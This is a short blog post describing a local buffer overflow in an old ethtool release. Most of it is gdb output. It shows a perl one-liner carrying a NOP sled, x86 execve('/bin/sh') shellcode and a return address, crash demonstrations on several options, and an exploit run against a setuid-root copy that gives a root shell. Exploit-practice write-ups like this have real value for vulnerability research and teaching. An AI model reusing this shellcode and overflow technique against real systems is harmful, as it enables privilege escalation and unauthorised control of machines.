During last days I was checking some old apps for Slackware 9.1.
My goal was to find some useful bugs to write few exploits (just for practice of course).
During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.
Below is a short note from testing (overflow in '-k' param):
---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface. See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS
Version 3 - January 27, 2005
* Feature: r8159 register dump support
* Feature / bug fix: Support advertising gigabit ethernet
* Bug fix: make sure to advertise 10baseT-HD
* Other minor bug fixes.
Version 2 - August 17, 2004
tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$
---<code>---
Few more options of ethtool are also vulnerable (seems to be the same buffer value):
---<code>---
tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
---<code>---
And if we'll set chown for root and +s for ethtool, we will get:
---<code>---
tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr 9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool
-=[ ethtool - local buffer overflow exploit ]=-
Offload parameters for 1ŔPh//shh/binăPSá°
Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#
---<code>---
That's all :)
Happy hunting!
o/
No comments:
Post a Comment
What do You think...?